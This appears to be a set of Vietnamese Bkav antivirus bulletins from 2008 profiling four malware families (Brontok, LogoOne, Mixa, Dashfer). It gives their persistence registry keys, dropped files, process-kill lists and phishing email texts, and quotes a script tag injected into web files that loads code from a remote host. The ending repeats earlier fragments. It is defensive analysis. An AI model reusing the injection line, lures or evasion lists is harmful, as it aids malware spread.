1 35. Bkav2004 - Phát hành lần thứ 2 ngày 17/11/2008, cập nhật G4eY5F, SkypeN, BrontokSD, FakeExpI, Itdead, MsFoxR Malware cập nhật mới nhất: Tên malware: W32.BrontokSD.Worm Thuộc họ: W32.Brontok.Worm Loại: Worm Xuất xứ: Nước ngoài Ngày phát hiện mẫu: 17/11/2008 Kích thước: 147 Kb Mức độ phá hoại: Trung bình Nguy cơ: Làm giảm mức độ an ninh của hệ thống. Hiện tượng: Sửa registry. Tắt các chương trình AntiVirus và các dịch vụ hệ thống của Windows Không vào được một vài trang web bảo mật và antivirus. Mất menu FoderOptions. Cách thức lây nhiễm: Phát tán qua trang Web Phát tán qua email : Với Subject là : "My Best Photo" Hoặc "Fotoku yg Paling Cantik" Kèm theo nội dung : "Hi, I want to share my photo with you. Wishing you all the best. Regards," Hoặc : "Hi, Aku lg iseng aja pengen kirim foto ke kamu. Jangan lupain aku ya ! Thanks," Cách phòng tránh: Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại Không nên mở file đính kèm không rõ nguồn gốc, đặc biệt là các file có đuôi .exe .com .pif và .bat Mô tả kỹ thuật: Tạo ra các bản sao của nó: o %Sysdir%\cmd-brontok.exe o %Windir%\Shellnew\[RandomName] o %Documents%\[UserName]\Local Settings\Application Data\csrss.exe o %Documents%\[UserName]\Local Settings\Application Data\lsass.exe o %Documents%\[UserName]\Local Settings\Application Data\br7911on.exe o %Documents%\[UserName]\Local Settings\Application Data\services.exe o %Documents%\[UserName]\Local Settings\Application Data\winlogon.exe o %Documents%\[UserName]\Local Settings\Application Data\inetinfo.exe Ghi giá trị: o "Bron-Spizaetus" vào key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run để chạy virus lúc hệ thống khởi động. o "Tok-Cirrhatus-3444" vào key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run để chạy virus lúc hệ thống khởi động. 2 Sửa file hosts ngăn không cho người dùng truy cập vào một vài trang web bảo mật. Sửa key không cho người dùng sử dụng một vài tiện ích của windows và làm mất menu FolderOptions. Tắt các process và các cửa sổ có chứa 1 trong các xâu : peid , task view, telanjang, bugil, cewe, naked, porn, sex, alwil, wintask, folder option,worm, trojan, avira, windows script, commander, pc-media, killer, ertanto, anti, ahnlab, nod32, hijack, sysinter, aladdin, panda, trend, cillin, mcaf, avast, bitdef, machine, movzx, kill, washer, remove, wscript, diary, untukmu, kangen, sstray, Alicia, Mariana, Dian, foto, zlh, Anti, mspatch, siti, virus, services.com, ctfmon, nopdb, opscan, vptray, update, lexplorer, iexplorer, nipsvc, njeeves, cclaw, nvcoas, aswupdsv, ashmaisv, systray, riyani, xpshare, syslove, tskmgr, ccapps, ash, avg, poproxy, mcv Tìm các địa chỉ mail trong máy, đồng thời gửi mail có đính kèm virus tới các địa chỉ vừa tìm được. Chuyên viên phân tích : Nguyễn Quốc Nhân 36. Bkav2009 (20/11/2008) cập nhật lần thứ 1: LogoOneKA, MegabyA Malware cập nhật mới nhất: Tên malware: W32.LogoOneKA.PE Thuộc họ: W32.LogoOne.PE Loại: PE Xuất xứ: Trung Quốc Ngày phát hiện mẫu: 19/11/2008 Kích thước: 61Kb Mức độ phá hoại: Cao Nguy cơ: Ăn cắp thông tin cá nhân. Lây file Làm giảm mức độ bảo mật của hệ thống. Hiện tượng: Sửa registry. Dừng các chương trình diệt virus Làm chậm hệ thống. Mất icon của các file .exe Cách thức lây nhiễm: Phát tán qua trang web, phần mềm miễn phí. Phát tán qua các tài nguyên chia sẻ mạng nội bộ Cách phòng tránh: Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại Không nên mở file đính kèm không rõ nguồn gốc, đặc biệt là các file có đuôi .exe .com .pif và .bat Không nên share full các ổ đĩa, thư mục trong mạng nội bộ, nên đặt password truy cập nếu muốn chia sẻ quyền sửa và tạo file. Mô tả kỹ thuật: Ghi giá trị "load" = %WinDir%\uninstall\rundl132.exe vào key 3 HKLM\Software\Microsoft\Windows\CurrentVersion\Run để chạy virus mỗi khi windows được khởi động Kiểm tra đã tồn tại key [HKLM\SOFTWARE\Soft\DownloadWWW] với giá trị "auto" = "1" làm dấu hiệu xác định xem virus lây nhiễm chưa. Copy chính nó vào %Windir%\ Logo1_.exe %Windir%\uninstall\rundl132.exe Drop ra file: %WinDir%\RichDll.dll Ghi ngày lây nhiễm vào file C:\_desktop.ini Lây file bằng cách ghi code virus vào trước file gốc. Lây vào toàn bộ các file exe trong ổ cứng từ C đến Y. Lây qua mạng nội bộ bằng cách copy và lây vào các file exe trong các thư mục shared Không lây những file đường dẫn có chứa: • \Program Files\ • Common Files • ComPlus Applications • Documents and Settings • InstallShield Installation Information • Internet Explorer • Messenger • Microsoft Frontpage • Microsoft Office • Movie Maker • MSN • MSN Gaming Zone • NetMeeting • Outlook Express • Recycled • system • System Volume Information • system32 • windows • Windows Media Player • Windows NT • WindowsUpdate • winnt Kill các services và chương trình diệt virus: • "Kingsoft AntiVirus Service" • EGHOST.EXE • IPARMOR.EXE • KAVPFW.EXE • MAILMON.EXE • mcshield.exe • RavMon.exe • RavMonClass • Ravmond.EXE • regsvc.exe Chuyên viên phân tích : Nguyễn Công Cường Một số malware đáng chú ý cập nhật cùng ngày: W32.ARPspoofT.Trojan, W32.FarfliKA.Rootkit, W32.FialaKA.Worm, W32.MegabyA.Worm, W32.VtLightIA.PE, W32.KxvoET.Worm, W32.WinbetTT.Trojan, W32.AlureonB.Trojan, W32.ArfuBot.Trojan, W32.CimusCD.Rootkit, W32.MSFoxCB.Worm 4 37. Bkav2011 (21/11/2008) cập nhật lần thứ 1: Suchop, MixaFQ Malware cập nhật mới nhất: Tên malware: W32.MixaFQ.Worm Thuộc họ: W32Mixa.Worm Loại: Worm Xuất xứ: Việt Nam Ngày phát hiện mẫu: 20/11/2008 Kích thước: 3608Kb Mức độ phá hoại: Trung bình Nguy cơ: Làm giảm mức độ an ninh của hệ thống. Hiện tượng: Sửa registry. Bị logoff máy tính khi sử dụng 1 vài tiện ích của windows như: TaskMgr, RegistryTool, Không hiển thị được file ẩn và file hệ thống. Cách thức lây nhiễm: Phát tán qua trang web. Tự động lây nhiễm vào USB. Cách phòng tránh: Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa. Mô tả kỹ thuật: Ghi giá trị "Userinit " = %SysDir%\systemio.exe vào key HKLM\ \CurrentVersion\Winlogon\ và Virus=%WinDir%\Mixa.exe Vào key HKLM\ \CurrentVersion\Run để virus được kích hoạt mỗi khi Windows khởi động Copy bản thân thành các file : %SysDir%\systemio.exe %WinDir%\Mixa.exe Liên tục check các process, nếu thấy process có chứa 1 trong các xâu : taskmgr, procexp, regedit, mmc thì đóng tất cả các ứng dụng và LogOff máy tính. Copy bản thân thành file có tên "Mixa_I.exe" kèm theo file autorun.inf vào tất cả các ổ đĩa. Liên tục ghi key làm người dùng không hiện được các file ẩn và file hệ thống. Chuyên viên phân tích : Nguyễn Công Cường Một số malware đáng chú ý cập nhật cùng ngày: W32.ConthinA.Worm, W32.FialaKC.Worm, W32.HtmInfectB.Trojan, W32.Suchop.PE, W32.JvsoftLJ.Worm, W32.JvsoftLK.Worm, W32.OngameFS.Trojan, W32.RsnetJZ.Trojan, W32.Lin32.Trojan, W32.Sobicyt.Adware, W32.Soxpeca.Adware, 38. Bkav2013 - Phát hành lần thứ 1 ngày 22/11/2008, cập nhật DashferKA, VtLightKA, CkvoHGV, ResycleB, Cmhot Malware cập nhật mới nhất: Tên malware: W32. DashferKA.PE Thuộc họ: W32.Dashfer.PE Loại: PE 5 Xuất xứ: Trung Quốc Ngày phát hiện mẫu: 21/11/2008 Kích thước: 165Kb Mức độ phá hoại: Cao Nguy cơ: Làm giảm mức độ an ninh của hệ thống. Hiện tượng: Sửa registry. Không vào được chế độ safe mode của Windows. Xuất hiện popup các trang web tiếng Trung Quốc. Mất checkbox để hiển thị các file hệ thống. Cách thức lây nhiễm: Phát tán qua trang web. Tự động lây nhiễm qua USB. Lây qua các file thực thi. Cách phòng tránh: Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa. Mô tả kỹ thuật: Xóa các key : HKLM\ \Control\SafeBoot\Minimal\{4D36E967-E325- 11CE-BFC1-08002BE10318} HKLM\ \Control\SafeBoot\Network\{4D36E967-E325- 11CE-BFC1-08002BE10318} làm cho máy tính không khởi động được trong chế độ safemode. HKLM\Software\Microsoft\Windows\CurrentVersion\Run Copy bản thân thành file có tên "lsass.exe" vào thư mục %SysDir%\Com, và ~.exe vào thư mục Startup để virus được thực thi khi khởi đông hệ thống. Tạo Mutex: CNJBlaipbofF để chỉ 1 file virus chạy trên 1 máy. Dump ra các file : %SysDir%\Com\smss.exe %SysDir%\Com\netcfg.dll %SysDir%\Com\netcfg.000 %SysDir%\Drivers\Alg.exe Sửa key làm mất checkbox để hiển thị các file hệ thống. Copy bản thân thành file có tên : "pagefile.pif" kèm theo file autorun.inf vào tất cả các ổ đĩa. Tắt các process có chứa một trong các xâu sau : rav, avp, twister, kv, watch, kissvc, scan, guard. Thêm vào cuối các file có đuôi: jsp, php, spx, asp, tml, htm tìm thấy trên máy trừ ổ đĩa hệ thống (kể cả trong các file nén .rar) đoạn script : <script src="http://js.k01[removed].com/01.asp"></script> Lây nhiễm vào các file thực thi tìm được trong máy trừ ổ đĩa hệ thống. Chuyên viên phân tích : Nguyễn Ngọc Dũng . tượng: Sửa registry. Tắt các chương trình AntiVirus và các dịch vụ hệ thống của Windows Không vào được một vài trang web bảo mật và antivirus. Mất menu FoderOptions. Cách thức lây. HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun để chạy virus lúc hệ thống khởi động. o "Tok-Cirrhatus-3444" vào key HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun để chạy virus lúc hệ thống khởi động HKLMSoftwareMicrosoftWindowsCurrentVersionRun để chạy virus mỗi khi windows được khởi động Kiểm tra đã tồn tại key [HKLMSOFTWARESoftDownloadWWW] với giá trị "auto" = "1" làm dấu hiệu xác định xem virus lây nhiễm